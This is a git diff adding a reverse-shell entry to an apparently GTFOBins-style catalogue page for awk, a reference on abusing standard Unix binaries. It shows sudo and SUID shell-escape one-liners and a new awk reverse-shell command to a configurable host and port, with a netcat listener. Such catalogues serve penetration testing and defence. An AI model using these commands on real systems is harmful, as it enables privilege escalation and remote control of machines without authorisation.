diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index c0ccd9f..9c72c28 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -6,4 +6,7 @@ functions: - code: sudo awk 'BEGIN {system("/bin/sh -p")}' suid-limited: - code: ./awk 'BEGIN {system("/bin/sh -p")}' ---- \ No newline at end of file + reverse-shell: + - description: Run `nc -l -p 8000` to receive the shell on the other end. + code: awk -v RHOST=localhost -v RPORT=8000 'BEGIN {s = "/inet/tcp/0/" RHOST "/" RPORT; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s;}}' +---